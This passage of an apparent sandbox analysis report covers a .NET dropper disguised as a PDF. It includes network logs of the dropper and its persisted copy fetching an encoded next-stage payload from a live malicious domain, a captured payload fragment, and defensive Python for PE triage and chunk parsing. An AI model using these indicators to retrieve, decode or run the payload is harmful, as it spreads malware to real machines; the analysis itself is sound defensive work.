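    RVA 0x2010; a 0x20-byte dummy signature blob is appended and referenced."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                       # e_lfanew
    struct.pack_into("<4sHHIIIHH", hdr, 0x80, b"PE\0\0", 0x14C, 1, timestamp, 0, 0, 0xE0, 0x0102)
    opt = 0x98
    struct.pack_into("<H", hdr, opt, 0x10B)                       # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, 0x2010)                 # AddressOfEntryPoint
    struct.pack_into("<I", hdr, opt + 28, 0x400000)               # ImageBase
    struct.pack_into("<II", hdr, opt + 32, 0x2000, 0x200)         # Section/FileAlignment
    struct.pack_into("<I", hdr, opt + 92, 16)                     # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96 + 8 * DIR_SECURITY, 0x400, 0x20)
    struct.pack_into("<II", hdr, opt + 96 + 8 * DIR_IAT, 0x2000, 0x8)
    struct.pack_into("<II", hdr, opt + 96 + 8 * DIR_COM_DESCRIPTOR, 0x2008, 0x48)
    struct.pack_into("<8sIIIIIIHHI", hdr, opt + 0xE0, b".text", 0x100, 0x2000,
                     0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    text = bytearray(0x200)
    text[0x10:0x16] = b"\xff\x25" + struct.pack("<I", 0x402000)
    return bytes(hdr + text + bytes(0x20))


def triage_constructed(timestamp=SAMPLE_TIMESTAMP):
    """Run the checks on the constructed image with the report's reference dates."""
    return triage(build_sample_pe(timestamp), SEEN_AT, CERT_NOT_BEFORE, CERT_NOT_AFTER)
```

Calling triage_constructed() reproduces the report's picture: a 2042 build date that is both in the future and outside the certificate window, a CLR header with the expected stub, and a signature blob that ends exactly at the last byte of the file. Passing a sane timestamp such as 1614034800 (22 Feb 2021 23:00 UTC) leaves only the two structural findings, which is the point of keeping the date checks separate from the format checks. To run it on a real file, read the bytes and call triage() with the first-seen time and the certificate dates taken from the signature.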

                                                      Resources

Name       | RVA    | Size  | Type | Language | Country
RT_VERSION | 0x8058 | 0x388 | data | English  | United States

                                                      Imports

DLL         | Import
mscoree.dll | _CorExeMain

                                                      Version Infos

Description      | Data
LegalCopyright   | Copyright 2022 OtGrGmtX. All rights reserved.
Assembly Version | 2.0.0.0
InternalName     | UAudJRAa.exe
FileVersion      | 5.6.7.5
CompanyName      | GufJmDYg
LegalTrademarks  | PipcRtfK
Comments         | OYCJFaen
ProductName      | UAudJRAa
ProductVersion   | 2.0.0.0
FileDescription  | PSnwJvyK
OriginalFilename | UAudJRAa.exe
Translation      | 0x0409 0x0514

                                                      Possible Origin

Language of compilation system | Country where language is spoken
English                        | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp                            Src Port  Dst Port  Source IP      Dest IP
Feb 23, 2021 09:31:55.365534067 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.419498920 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.419733047 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.421120882 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.473939896 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522285938 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522311926 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522329092 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522346020 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522362947 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522394896 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522416115 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522416115 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.522437096 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522459984 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522486925 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.522500038 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.522510052 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.522548914 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.523546934 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.523591995 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.523659945 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.524774075 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.524811983 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.524888992 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.526022911 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.526061058 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.526165962 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.527287006 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.527323961 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.527388096 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.528487921 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.528526068 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.528582096 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.529700994 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.529745102 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.529813051 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.531016111 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.531054974 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.531116962 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.532171965 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.532208920 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.532284975 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.533441067 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.533478975 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.533586025 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.534662962 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.534698963 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.535109043 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.577127934 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.577382088 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.577446938 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.577450037 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.578651905 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.578690052 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.578715086 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.579884052 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.579921007 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.579961061 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.581100941 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.581135988 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.581172943 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.582341909 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.582379103 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.582408905 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.584508896 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.584544897 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.584582090 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.584772110 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.584798098 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.584834099 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.586030960 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.586067915 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.586086988 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.587313890 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.587351084 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.587388992 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.588530064 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.588566065 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.588607073 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.589809895 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.589840889 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.589889050 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.591028929 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.591110945 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.591577053 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.591618061 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.591686964 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.592833996 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.592886925 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.592935085 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.594082117 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.594115973 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.594165087 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.595326900 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.595365047 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.595403910 CET  49731     80        192.168.2.4    172.67.172.17
Feb 23, 2021 09:31:55.596564054 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.596601009 CET  80        49731     172.67.172.17  192.168.2.4
Feb 23, 2021 09:31:55.596663952 CET  49731     80        192.168.2.4    172.67.172.17

UDP Packets

Timestamp                            Src Port  Dst Port  Source IP      Dest IP
Feb 23, 2021 09:31:46.810556889 CET  49714     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:46.859141111 CET  53        49714     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:47.039196968 CET  58028     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:47.087939024 CET  53        58028     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:47.716562986 CET  53097     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:47.768197060 CET  53        53097     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:49.358711958 CET  49257     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:49.415843010 CET  53        49257     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:50.278305054 CET  62389     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:50.329797983 CET  53        62389     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:50.823911905 CET  49910     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:50.882304907 CET  53        49910     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:55.273324013 CET  55854     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:55.335468054 CET  53        55854     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:56.667977095 CET  64549     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:56.719338894 CET  53        64549     8.8.8.8        192.168.2.4
Feb 23, 2021 09:31:57.637877941 CET  63153     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:31:57.686521053 CET  53        63153     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:01.356560946 CET  52991     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:01.405291080 CET  53        52991     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:02.548392057 CET  53700     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:02.599906921 CET  53        53700     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:03.818628073 CET  51726     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:03.870130062 CET  53        51726     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:05.029747963 CET  56794     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:05.078617096 CET  53        56794     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:06.247302055 CET  56534     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:06.296017885 CET  53        56534     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:07.379823923 CET  56627     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:07.431444883 CET  53        56627     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:08.375817060 CET  56621     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:08.433149099 CET  53        56621     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:09.566751957 CET  63116     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:09.615370989 CET  53        63116     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:13.410522938 CET  64078     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:13.463491917 CET  53        64078     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:17.755178928 CET  64801     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:17.804676056 CET  53        64801     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:18.681122065 CET  61721     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:18.729921103 CET  53        61721     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:19.444901943 CET  51255     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:19.496496916 CET  53        51255     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:20.919595003 CET  61522     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:20.971292973 CET  53        61522     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:37.528866053 CET  52337     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:37.580564022 CET  53        52337     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:38.476026058 CET  55046     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:38.524744034 CET  53        55046     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:41.844392061 CET  49612     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:41.903660059 CET  53        49612     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:42.007838964 CET  49285     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:42.065799952 CET  53        49285     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:42.580985069 CET  50601     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:42.652038097 CET  53        50601     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:43.635890961 CET  60875     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:43.696485996 CET  53        60875     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:44.345980883 CET  56448     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:44.406274080 CET  53        56448     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:44.869745016 CET  59172     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:44.929609060 CET  53        59172     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:44.980477095 CET  62420     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:45.052990913 CET  53        62420     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:45.445525885 CET  60579     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:45.502540112 CET  53        60579     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:46.060790062 CET  50183     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:46.118223906 CET  53        50183     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:46.719317913 CET  61531     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:46.777683973 CET  53        61531     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:47.794459105 CET  49228     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:47.851723909 CET  53        49228     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:50.070044041 CET  59794     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:50.135446072 CET  53        59794     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:50.722119093 CET  55916     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:50.789313078 CET  53        55916     8.8.8.8        192.168.2.4
Feb 23, 2021 09:32:50.850657940 CET  52752     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:32:50.913300037 CET  53        52752     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:03.658575058 CET  60542     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:03.717711926 CET  53        60542     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:38.864717007 CET  60689     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:38.914076090 CET  53        60689     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:39.884452105 CET  64206     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:39.936356068 CET  53        64206     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:46.507957935 CET  50904     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:46.556616068 CET  53        50904     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:49.246140957 CET  57525     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:49.311268091 CET  53        57525     8.8.8.8        192.168.2.4
Feb 23, 2021 09:33:58.246351004 CET  53814     53        192.168.2.4    8.8.8.8
Feb 23, 2021 09:33:58.435498953 CET  53        53814     8.8.8.8        192.168.2.4

DNS Queries

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                    Type            Class
Feb 23, 2021 09:31:55.273324013 CET  192.168.2.4  8.8.8.8  0xe96     Standard query (0)  coroloboxorozor.com     A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:41.844392061 CET  192.168.2.4  8.8.8.8  0x5179    Standard query (0)  coroloboxorozor.com     A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:50.850657940 CET  192.168.2.4  8.8.8.8  0x632f    Standard query (0)  coroloboxorozor.com     A (IP address)  IN (0x0001)
Feb 23, 2021 09:33:58.246351004 CET  192.168.2.4  8.8.8.8  0x62be    Standard query (0)  mail.orienttech.com.qa  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address        Type            Class
Feb 23, 2021 09:31:55.335468054 CET  8.8.8.8    192.168.2.4  0xe96     No error (0)  coroloboxorozor.com     -      172.67.172.17  A (IP address)  IN (0x0001)
Feb 23, 2021 09:31:55.335468054 CET  8.8.8.8    192.168.2.4  0xe96     No error (0)  coroloboxorozor.com     -      104.21.71.230  A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:41.903660059 CET  8.8.8.8    192.168.2.4  0x5179    No error (0)  coroloboxorozor.com     -      104.21.71.230  A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:41.903660059 CET  8.8.8.8    192.168.2.4  0x5179    No error (0)  coroloboxorozor.com     -      172.67.172.17  A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:50.913300037 CET  8.8.8.8    192.168.2.4  0x632f    No error (0)  coroloboxorozor.com     -      172.67.172.17  A (IP address)  IN (0x0001)
Feb 23, 2021 09:32:50.913300037 CET  8.8.8.8    192.168.2.4  0x632f    No error (0)  coroloboxorozor.com     -      104.21.71.230  A (IP address)  IN (0x0001)
Feb 23, 2021 09:33:58.435498953 CET  8.8.8.8    192.168.2.4  0x62be    No error (0)  mail.orienttech.com.qa  -      162.241.85.66  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• coroloboxorozor.com

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.4  49731        172.67.172.17   80                C:\Users\user\Desktop\0603321WG_0_1 pdf.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 23, 2021 09:31:55.421120882 CET  1684                OUT        GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 23, 2021 09:31:55.522285938 CET  1685                IN         HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:31:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dc950d50823a3f78f8842068f1c799aeb1614069115; expires=Thu, 25-Mar-21 08:31:55 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
Last-Modified: Mon, 22 Feb 2021 21:10:03 GMT
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
cf-request-id: 086f9d424200004c3ee703b000000001
Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9WsG7wXim0KrN9jNbihYYsdftrCPjt7SgRQ5DDrJalxV6o3vJIsmqVun5nHLMckxJOBBvhihddmlpT5gUS63WCbG%2BkuErFa3BFF8C2nzKZz7iXr0"}]}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 625f97e39d6a4c3e-AMS
                                                      Data Raw: 37 63 39 39 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 49 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 7a 6f 7a 6f 70 62 6f 4c 70 6f 70 52 49 6f 70 62 6f 7a 6f 70 52 7a 6f 69 6f 58 7a 4b 6f 4c 4c 6f 70 52 62 6f 70 6f 4d 49 6f 58 7a 4b 6f 4c 4c 6f 52 62 6f 70 7a 62 6f 70 7a 4b 6f 70 70 4b 6f 4c 58 6f 70 70 58 6f 70 70 62 6f 70 70 70 6f 70 7a 4c 6f 70 70 62 6f 69 4d 6f 70 7a 69 6f 4c 58 6f 69 69 6f 69 4d 6f 70 70 7a 6f 70 70 7a 6f 70 70 70 6f 70 70 49 6f 4c 58 6f 69 52 6f 70 7a 70 6f 4c 58 6f 70 70 62 6f 70 70 4d 6f 70 70 7a 6f 4c 58 6f 70 7a 4b 6f 70 70 7a 6f 4c 58 6f 49 52 6f 4d 69 6f 52 4c 6f 4c 58 6f 70 7a 69 6f 70 70 70 6f 70 7a 7a 6f 70 7a 70 6f 62 49 6f 70 4c 6f 70 4c 6f 70 7a 6f 4c 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 52 7a 6f 49 69 6f 7a 6f 7a 6f 4d 49 6f 70 6f 4c 6f 7a 6f 4d 49 6f 70 62 58 6f 62 70 6f 70 52 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 58 62 6f 7a 6f 4c 62 6f 7a 6f 70 70 6f 70 6f 52 7a 6f 7a 6f 7a 6f 70 70 52 6f 62 6f 7a 6f 7a 6f 49 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 58 4c 52 6f 70 62 52 6f 62 6f 7a 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 70 49 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 70 58 52 6f 7a 6f 4c 58 6f 7a 6f 7a 6f 7a 6f 58 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 62 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f 7a 6f
                                                      Data Ascii: 7c99<p>MMoizopbbozoLozozozobozozozoXKKoXKKozozopRbozozozozozozozoIbozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozozopXRozozozopboLpopRIopbozopRzoioXzKoLLopRbopoMIoXzKoLLoRbopzbopzKoppKoLXoppXoppbopppopzLoppboiMopzioLXoiioiMoppzoppzopppoppIoLXoiRopzpoLXoppboppMoppzoLXopzKoppzoLXoIRoMioRLoLXopziopppopzzopzpobIopLopLopzoLIozozozozozozozoRzoIiozozoMIopoLozoMIopbXobpopRzozozozozozozozozoXXbozoLbozoppopoRzozozoppRobozozoIozozozozozozoXLRopbRobozozoLXozozozopIzobozozozozopXRozoLXozozozoXozozobozozozozozozozobozozozozozozo
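The Data Raw dump of this response starts with the bytes 37 63 39 39 0d 0a, which is the chunk-size line "7c99\r\n" of the chunked transfer, followed by the "<p>"-wrapped letter string shown under Data Ascii; the page cuts the dump off long before the 0x7c99-byte chunk ends. The following Python is an added example, not code from the report: it parses the leading HTTP/1.1 chunk, reports the declared size against the bytes actually captured, and profiles the payload's symbol alphabet without decoding it (the report does not expose the encoding scheme, so none is assumed). The hex excerpt is constructed from the first 55 bytes of the dump above; the function names are this example's own.

```python
import re

# Constructed excerpt: the first 55 bytes of the session-0 "Data Raw" dump above.
# The page truncates the dump; the server declared a 0x7c99-byte chunk.
DATA_RAW_HEX = (
    "37 63 39 39 0d 0a 3c 70 3e 4d 4d 6f 69 7a 6f 70 62 62 6f 7a 6f 4c 6f 7a 6f 7a 6f "
    "7a 6f 62 6f 7a 6f 7a 6f 7a 6f 58 4b 4b 6f 58 4b 4b 6f 7a 6f 7a 6f 70 52 62 6f 7a 6f"
)


def parse_first_chunk(raw):
    """Parse the leading HTTP/1.1 chunk of a chunked body.

    Returns (declared_size, body_bytes, complete). Only the chunk-size line and
    the bytes after it are inspected; a chunk extension after ';' is ignored.
    """
    head, sep, rest = raw.partition(b"\r\n")
    if not sep:
        raise ValueError("no chunk-size line terminator")
    size_field = head.split(b";", 1)[0].strip()
    if not re.fullmatch(rb"[0-9A-Fa-f]{1,8}", size_field):
        raise ValueError(f"malformed chunk size {head!r}")
    size = int(size_field, 16)
    body = rest[:size]
    # A complete chunk carries exactly `size` bytes followed by CRLF.
    complete = len(rest) >= size + 2 and rest[size:size + 2] == b"\r\n"
    return size, body, complete


def payload_profile(body):
    """Describe the encoded payload without decoding it: whether it is wrapped
    in <p>, how many symbols were captured, and which characters they use."""
    text = body.decode("ascii", errors="replace")
    m = re.match(r"<p>([A-Za-z]+)", text)
    symbols = m.group(1) if m else ""
    return {
        "wrapped_in_p": m is not None,
        "symbol_count": len(symbols),
        "alphabet": "".join(sorted(set(symbols))),
    }


def analyze_dump(hex_dump):
    """Hex dump (space-separated byte pairs, as in the report) -> profile dict."""
    raw = bytes.fromhex(hex_dump)
    size, body, complete = parse_first_chunk(raw)
    profile = payload_profile(body)
    profile.update(declared_size=size, captured=len(body), complete=complete)
    return profile


if __name__ == "__main__":
    print(analyze_dump(DATA_RAW_HEX))
```

On the excerpt the parser reports a declared size of 31897 bytes with 49 captured and the chunk incomplete, so anything built on top of it must treat the body as a prefix. The small letter alphabet of the payload (ten distinct characters in the excerpt, all inside a single <p> element) is what you would carry into the .NET decompilation of the dropper to find the routine that turns that string back into the next stage.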


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.4  49750        104.21.71.230   80                C:\Users\user\AppData\Roaming\NewApp\NewApp.exe

Timestamp                            kBytes transferred  Direction  Data
Feb 23, 2021 09:32:41.990319014 CET  3588                OUT        GET /base/008D1C43D45C0A742A0D32B591796DBD.html HTTP/1.1
Host: coroloboxorozor.com
Connection: Keep-Alive
Feb 23, 2021 09:32:42.586678028 CET  3591                IN         HTTP/1.1 200 OK
Date: Tue, 23 Feb 2021 08:32:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
